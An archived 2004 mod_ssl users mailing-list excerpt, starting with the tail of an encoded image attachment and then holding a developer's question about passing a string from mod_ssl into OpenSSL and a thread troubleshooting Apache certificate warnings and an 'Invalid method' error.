3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 15 10:34:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5566AA893A; Tue, 15 Jun 2004 10:34:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from f12.mail.ru (f12.mail.ru [194.67.57.42])
	by master.modssl.org (Postfix) with ESMTP id 2D1D5A8A4D
	for ; Tue, 15 Jun 2004 10:34:33 +0200 (CEST)
Received: from mail by f12.mail.ru with local 
	id 1Ba9Oh-0003cP-00
	for modssl-users@modssl.org; Tue, 15 Jun 2004 12:34:23 +0400
Received: from [195.161.208.140] by msg.mail.ru with HTTP;
	Tue, 15 Jun 2004 12:34:23 +0400
From: 
To: modssl-users@modssl.org
Subject: Transmit string
Mime-Version: 1.0
X-Mailer: mPOP Web-Mail 2.19
X-Originating-IP: 172.17.2.35, 195.161.219.2 via proxy [195.161.208.140]
Date: Tue, 15 Jun 2004 12:34:23 +0400
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear Ralf S. Engelschall and other developers, I have problem.
Help me solve a problem, very need.

It is necessary read a line of the text (additional information on the user) in the module mod_ssl
and to transfer it in the module openssl.
Reading of a line to make in the mod_ssl: file: ssl_engine_pphrase.c; function: ssl_pphrase_Handle
and to transfer in the openssl: file: s3_srvr.c; function: ssl3_accept.

Apache 2.0.49 - Openssl0.9.6m

I make approximately as below:
//------mod_ssl.h------//
typedef struct {
    pid_t           pid;
    apr_pool_t     *pPool;
.....
    char	*szinf; //!!! <- Add
.....
    struct {
        void *pV1, *pV2, *pV3, *pV4, *pV5, *pV6, *pV7, *pV8, *pV9, *pV10;
    } rCtx;
} SSLModConfigRec;

//-----ssl_engine_pphrase.c----//
void ssl_pphrase_Handle(server_rec *s, apr_pool_t *p)
{
.....
    mc->szinf = apr_palloc(p,sizeof(char *) * 100);
    char *buf = apr_palloc(p, sizeof(char *) * 100);
    apr_file_open_stdout(&writetty, p);
    i = EVP_read_pw_string(buf, bufsize, "", FALSE);
    apr_cpystrn(mc->szinf,buf,strlen(buf)+1);
    //mc->inf - contain reading string
.....
}

//-----ssl_engine_init.c----//
static int ssl_server_import_key(server_rec *s, modssl_ctx_t *mctx, const char *id, int idx)
{
.....
apr_cpystrn(mctx->ssl_ctx->infO, mc->szinf,strlen(mc->szinf)+1); // <- copy string to struct ssl_ctx
.....
}

//-----ssl.h-----//
struct ssl_ctx_st
{
	char infO[100];    // <- string to openssl
	SSL_METHOD *method;
	unsigned long options;
	unsigned long mode;
.....
}

//-----s3_srvr.c-----//
int ssl3_accept(SSL *s)
{
   char *buf = s->ctx->infO; //NULL string !!!!! AND NEED GET inf from ssl_pphrase_Handle
.....
}

Seems, struct SSL_CTX clearing after fork process, this so?
And How can save string after fork process?
Suggest to me idea.

Thanks.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 11:07:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D23A1A8A55; Wed, 16 Jun 2004 11:07:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rye2kes4.mobius.com (rye.mobius.com [204.126.130.10])
	by master.modssl.org (Postfix) with ESMTP id F33D3A8995
	for ; Wed, 16 Jun 2004 11:07:18 +0200 (CEST)
Received: by rye2kest.Mobius.com with Internet Mail Service (5.5.2657.72)
	id ; Wed, 16 Jun 2004 05:07:04 -0400
Message-ID: <89B3700F1199D411A0CB00508BEE227E0B3F40E4@ryentes1.mobius.com>
From: Richard Skeggs 
To: "'modssl-users@modssl.org'" 
Subject: Certificate Problems
Date: Wed, 16 Jun 2004 05:07:02 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C45381.49C586E8"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Richard Skeggs 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C45381.49C586E8
Content-Type: text/plain;
	charset="iso-8859-1"


I am trying to set up ssl on my server and I have been through what I
believe are the correct settings. I can run the command line script 'openssl
s_client -connect eghapp:443 -state -debug' I don't appear to get an error
message. However when trying to start apache using the startssl switch the
following error turns up in the ssl_error_log

[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate is a CA certificate
(BasicConstraints: CA == TRUE !?)
[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate is a CA certificate
(BasicConstraints: CA == TRUE !?)
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?
[Tue Jun 15 15:26:34 2004] [error] [client 10.14.1.150] Invalid method in
request 

I have also been able to successfully run the command 'curl https://eghapp
 '. However when I try to run 'https://eghapp
 ' through the browser I get an error saying that the DNS
server cannot be found. On checking the nothing gets written to any of the
ssl log files.

Does anyone know how I can resolve this?

Thanks

Richard Skeggs
Software Engineer
Mobius Management Systems
Cavendish House
5 The Avenue
Egham
Surrey
TW20 9AB
Tel: +44 (0) 1784 484700
Mobile: + 44 (0) 7971 608315
email: rskeggs@mobius.com  
 


------_=_NextPart_001_01C45381.49C586E8
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Certificate Problems






I am trying to set up ssl on my server =
and I have been through what I believe are the correct settings. I can =
run the command line script 'openssl s_client -connect eghapp:443 =
-state -debug' I don't appear to get an error message. However when =
trying to start apache using the startssl switch the following error =
turns up in the ssl_error_log



[Tue Jun 15 15:11:04 2004] [warn] RSA =
server certificate is a CA certificate (BasicConstraints: CA =3D=3D =
TRUE !?)

[Tue Jun 15 15:11:04 2004] [warn] RSA =
server certificate CommonName (CN) `localhost.localdomain' does NOT =
match server name!?



[Tue Jun 15 15:11:07 2004] [warn] RSA =
server certificate is a CA certificate (BasicConstraints: CA =3D=3D =
TRUE !?)

[Tue Jun 15 15:11:07 2004] [warn] RSA =
server certificate CommonName (CN) `localhost.localdomain' does NOT =
match server name!?



[Tue Jun 15 15:26:34 2004] [error] =
[client 10.14.1.150] Invalid method in request 




I have also been able to successfully =
run the command 'curl https://eghapp'. However when I try to run 'https://eghapp' through the browser I get an error saying that the DNS =
server cannot be found. On checking the nothing gets written to any of =
the ssl log files.



Does anyone know how I can resolve =
this?




Thanks




Richard Skeggs

Software Engineer

Mobius Management Systems

Cavendish House

5 The Avenue

Egham

Surrey

TW20 9AB

Tel: +44 (0) 1784 484700

Mobile:=A0+ 44 (0) 7971 608315

email: rskeggs@mobius.com

=A0





------_=_NextPart_001_01C45381.49C586E8--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 11:20:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A80E8A8A61; Wed, 16 Jun 2004 11:20:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 4CA3CA8958
	for ; Wed, 16 Jun 2004 11:20:35 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id i5G9KNQ6025684
	for ; Wed, 16 Jun 2004 11:20:23 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i5G9KM3J020671
	for ; Wed, 16 Jun 2004 11:20:22 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: Certificate Problems
Date: Wed, 16 Jun 2004 11:20:22 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: Certificate Problems
Thread-Index: AcRTgY5jAlR539dASmmsRBgToWb+/gAAFx6g
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Plain text please...

If you got an error in the ssl error-log then apache must be running.
The invalid method error is exactly that - the HTTP method wasn't GET,
POST etc... What request were you making when you got the error?
Cross-check the access log for details...

It looks like your certificate common name is localhost.localdomain and
this doesn't match the ServerName argument which is what the warning is
about.

The DNS error means that he browser cannot resolve eghapp to an IP
address while curl, apparently, can. No idea why - depends on OS,
browser version, config etc. (eg, if the browser goes via a proxy, the
proxy will not see a local /etc/hosts definition of eghapp).=20

Tip: if you post back, cut'n'paste exact error messages - do not
paraphrase as this loses important information. Also, give OS, apache
1.3 or 2 etc.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.



-----Original Message-----
From: Richard Skeggs [mailto:RSKEGGS@mobius.com]
Sent: Mittwoch, 16. Juni 2004 11:07
To: 'modssl-users@modssl.org'
Subject: Certificate Problems




I am trying to set up ssl on my server and I have been through what I
believe are the correct settings. I can run the command line script
'openssl s_client -connect eghapp:443 -state -debug' I don't appear to
get an error message. However when trying to start apache using the
startssl switch the following error turns up in the ssl_error_log
[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA =3D=3D TRUE !?)=20
[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA =3D=3D TRUE !?)=20
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?
[Tue Jun 15 15:26:34 2004] [error] [client 10.14.1.150] Invalid method
in request=20
I have also been able to successfully run the command 'curl
https://eghapp'. However when I try to run 'https://eghapp' through the
browser I get an error saying that the DNS server cannot be found. On
checking the nothing gets written to any of the ssl log files.
Does anyone know how I can resolve this?=20
Thanks=20
Richard Skeggs=20
Software Engineer=20
Mobius Management Systems=20
Cavendish House=20
5 The Avenue=20
Egham=20
Surrey=20
TW20 9AB=20
Tel: +44 (0) 1784 484700=20
Mobile: + 44 (0) 7971 608315=20
email: rskeggs@mobius.com

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 17:29:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E5EB6A8995; Wed, 16 Jun 2004 17:29:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pobox.co.uk (ws.pobox.co.uk [217.27.240.72])
	by master.modssl.org (Postfix) with ESMTP id 86E5AA8943
	for ; Wed, 16 Jun 2004 17:29:37 +0200 (CEST)
Received: from localhost ([127.0.0.1] helo=mail.pobox.co.uk)
	by mail.pobox.co.uk with smtp (Exim 4.31)
	id 1BacLv-0008SG-Ra
	for modssl-users@modssl.org; Wed, 16 Jun 2004 16:29:27 +0100
Received: from uk.mobius.com ([204.126.130.14])
        (SquirrelMail authenticated user rskeggs)
        by mail.pobox.co.uk with HTTP;
        Wed, 16 Jun 2004 16:29:27 +0100 (BST)
Message-ID: <46772.204.126.130.14.1087399767.squirrel@mail.pobox.co.uk>
Date: Wed, 16 Jun 2004 16:29:27 +0100 (BST)
Subject: FW: Certificate Problems
From: "richard skeggs" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.1
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "richard skeggs" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the response, to explain abit more the error I see in the log
file only get written when I start apache using apachactl startssl the
message written to ssl_error_log is:

[Wed Jun 16 10:59:48 2004] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?) [Wed Jun 16 10:59:48 2004]
[warn] RSA server certificate CommonName (CN) `localhost.localdomain' does
NOT match server name!? [Wed Jun 16 10:59:50 2004] [warn] RSA server
certificate is a CA certificate (BasicConstraints: CA == TRUE !?) [Wed Jun
16 10:59:50 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?

As for the the request I was making it was to simply get the home page of
eghapp

Using the url http://eghapp:8000 through my browser I get to view the home
page of eghapp

However https://eghapp:8000 I get the following log message  from
error_log: [Wed Jun 16 11:08:05 2004] [error] [client 10.14.2.8] Invalid
method in request!L!!  From access_log: 10.14.2.8 - -
[16/Jun/2004:11:07:38 +0100] " L" 501 1007 Nothing gets written to the ssl
message files. The browser returns

Cannot find server or DNS Error
Internet Explorer

I am trying to install ssl on the eghapp server which is a RedHat9 linux
box. An extract from the hosts file on eghapp is:

127.0.0.1               localhost loghost
10.14.1.150             eghapp

An extract from the httpd.conf file is shown below
Listen 8000
NameVirtualHost 10.14.1.150


    ProxyPass /esav http://eghsnap1:8081/esav
    ProxyPassReverse /esav http://eghsnap1:8081/esav
    ProxyPass /ddrint http://eghsnap2:8081/ddrint
    ProxyPassReverse /ddrint http://eghsnap2:8081/ddrint
    ProxyPass /vnc http://eghsnap1:80/vnc
    ProxyPassReverse /vnc http://eghsnap1:80/vnc
    ServerAdmin webmaster@mobius.com
    DocumentRoot /var/www/html
    ServerName eghapp
    ErrorLog logs/error_log
    CustomLog logs/access_log common
#


SSLProtocol -all +SSLv2
SSLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP
SSLCertificateFile /etc/httpd/server.csr
SSLCertificateKeyFile /etc/httpd/server.key


For your information I am running
   Apache 2.0.4.0
   IE 6.0.2

Richard


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Boyle Owen
Sent: 16 June 2004 10:20
To: modssl-users@modssl.org
Subject: RE: Certificate Problems


Plain text please...

If you got an error in the ssl error-log then apache must be running. The
invalid method error is exactly that - the HTTP method wasn't GET, POST
etc... What request were you making when you got the error? Cross-check
the access log for details...

It looks like your certificate common name is localhost.localdomain and
this doesn't match the ServerName argument which is what the warning is
about.

The DNS error means that he browser cannot resolve eghapp to an IP address
while curl, apparently, can. No idea why - depends on OS, browser version,
config etc. (eg, if the browser goes via a proxy, the proxy will not see a
local /etc/hosts definition of eghapp).

Tip: if you post back, cut'n'paste exact error messages - do not
paraphrase as this loses important information. Also, give OS, apache 1.3
or 2 etc.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.

Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Gruppe. This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le présent e-mail est un
message privé et personnel, sans rapport avec l'activité boursière du
Groupe SWX.



-----Original Message-----
From: Richard Skeggs [mailto:RSKEGGS@mobius.com]
Sent: Mittwoch, 16. Juni 2004 11:07
To: 'modssl-users@modssl.org'
Subject: Certificate Problems




I am trying to set up ssl on my server and I have been through what I
believe are the correct settings. I can run the command line script
'openssl s_client -connect eghapp:443 -state -debug' I don't appear to get
an error message. However when trying to start apache using the startssl
switch the following error turns up in the ssl_error_log [Tue Jun 15
15:11:04 2004] [warn] RSA server certificate is a CA certificate
(BasicConstraints: CA == TRUE !?)
[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!? [Tue Jun 15 15:11:07
2004] [warn] RSA server certificate is a CA certificate (BasicConstraints:
CA == TRUE !?)
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!? [Tue Jun 15 15:26:34
2004] [error] [client 10.14.1.150] Invalid method in request
I have also been able to successfully run the command 'curl
https://eghapp'. However when I try to run 'https://eghapp' through the
browser I get an error saying that the DNS server cannot be found. On
checking the nothing gets written to any of the ssl log files. Does anyone
know how I can resolve this?
Thanks
Richard Skeggs
Software Engineer
Mobius Management Systems
Cavendish House
5 The Avenue
Egham
Surrey
TW20 9AB
Tel: +44 (0) 1784 484700
Mobile: + 44 (0) 7971 608315
email: rskeggs@mobius.com

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission. If
you receive this message in error, please notify the sender urgently and
then immediately delete the message and any copies of it from your system.
Please also immediately destroy any hardcopies of the message. You must
not, directly or indirectly, use, disclose, distribute, print, or copy any
part of this message if you are not the intended recipient. The sender's
company reserves the right to monitor all e-mail communications through
their networks. Any views expressed in this message are those of the
individual sender, except where the message states otherwise and the
sender is authorised to state them to be the views of the sender's
company.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 19:17:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2FB00A8995; Wed, 16 Jun 2004 19:17:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pobox.co.uk (ws.pobox.co.uk [217.27.240.72])
	by master.modssl.org (Postfix) with ESMTP id D5513A8943
	for ; Wed, 16 Jun 2004 19:17:15 +0200 (CEST)
Received: from localhost ([127.0.0.1] helo=mail.pobox.co.uk)
	by mail.pobox.co.uk with smtp (Exim 4.31)
	id 1Bae26-0006PN-4B
	for modssl-users@modssl.org; Wed, 16 Jun 2004 18:17:06 +0100
Received: from uk.mobius.com ([204.126.130.14])
        (SquirrelMail authenticated user rskeggs)
        by mail.pobox.co.uk with HTTP;
        Wed, 16 Jun 2004 18:17:06 +0100 (BST)
Message-ID: <48905.204.126.130.14.1087406226.squirrel@mail.pobox.co.uk>
Date: Wed, 16 Jun 2004 18:17:06 +0100 (BST)
Subject: [Fwd: FW: Certificate Problems]
From: "richard skeggs" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.1
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "richard skeggs" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Thanks for the response, to explain abit more the error I see in the log
file only get written when I start apache using apachactl startssl the
message written to ssl_error_log is:

[Wed Jun 16 10:59:48 2004] [warn] RSA server certificate is a CA
certificate (BasicConstraints: CA == TRUE !?) [Wed Jun 16 10:59:48 2004]
[warn] RSA server certificate CommonName (CN) `localhost.localdomain' does
NOT match server name!? [Wed Jun 16 10:59:50 2004] [warn] RSA server
certificate is a CA certificate (BasicConstraints: CA == TRUE !?) [Wed Jun
16 10:59:50 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?

As for the the request I was making it was to simply get the home page of
eghapp

Using the url http://eghapp:8000 through my browser I get to view the home
page of eghapp

However https://eghapp:8000 I get the following log message  from
error_log: [Wed Jun 16 11:08:05 2004] [error] [client 10.14.2.8] Invalid
method in request!L!!  From access_log: 10.14.2.8 - -
[16/Jun/2004:11:07:38 +0100] " L" 501 1007 Nothing gets written to the ssl
message files. The browser returns

Cannot find server or DNS Error
Internet Explorer

I am trying to install ssl on the eghapp server which is a RedHat9 linux
box. An extract from the hosts file on eghapp is:

127.0.0.1               localhost loghost
10.14.1.150             eghapp

An extract from the httpd.conf file is shown below
Listen 8000
NameVirtualHost 10.14.1.150


    ProxyPass /esav http://eghsnap1:8081/esav
    ProxyPassReverse /esav http://eghsnap1:8081/esav
    ProxyPass /ddrint http://eghsnap2:8081/ddrint
    ProxyPassReverse /ddrint http://eghsnap2:8081/ddrint
    ProxyPass /vnc http://eghsnap1:80/vnc
    ProxyPassReverse /vnc http://eghsnap1:80/vnc
    ServerAdmin webmaster@mobius.com
    DocumentRoot /var/www/html
    ServerName eghapp
    ErrorLog logs/error_log
    CustomLog logs/access_log common
#


SSLProtocol -all +SSLv2
SSLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP
SSLCertificateFile /etc/httpd/server.csr
SSLCertificateKeyFile /etc/httpd/server.key


For your information I am running
   Apache 2.0.4.0
   IE 6.0.2

Richard


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Boyle Owen
Sent: 16 June 2004 10:20
To: modssl-users@modssl.org
Subject: RE: Certificate Problems


Plain text please...

If you got an error in the ssl error-log then apache must be running. The
invalid method error is exactly that - the HTTP method wasn't GET, POST
etc... What request were you making when you got the error? Cross-check
the access log for details...

It looks like your certificate common name is localhost.localdomain and
this doesn't match the ServerName argument which is what the warning is
about.

The DNS error means that he browser cannot resolve eghapp to an IP address
while curl, apparently, can. No idea why - depends on OS, browser version,
config etc. (eg, if the browser goes via a proxy, the proxy will not see a
local /etc/hosts definition of eghapp).

Tip: if you post back, cut'n'paste exact error messages - do not
paraphrase as this loses important information. Also, give OS, apache 1.3
or 2 etc.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.

Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Gruppe. This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le présent e-mail est un
message privé et personnel, sans rapport avec l'activité boursière du
Groupe SWX.



-----Original Message-----
From: Richard Skeggs [mailto:RSKEGGS@mobius.com]
Sent: Mittwoch, 16. Juni 2004 11:07
To: 'modssl-users@modssl.org'
Subject: Certificate Problems




I am trying to set up ssl on my server and I have been through what I
believe are the correct settings. I can run the command line script
'openssl s_client -connect eghapp:443 -state -debug' I don't appear to get
an error message. However when trying to start apache using the startssl
switch the following error turns up in the ssl_error_log [Tue Jun 15
15:11:04 2004] [warn] RSA server certificate is a CA certificate
(BasicConstraints: CA == TRUE !?)
[Tue Jun 15 15:11:04 2004] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!? [Tue Jun 15 15:11:07
2004] [warn] RSA server certificate is a CA certificate (BasicConstraints:
CA == TRUE !?)
[Tue Jun 15 15:11:07 2004] [warn] RSA server certificate CommonName (CN)
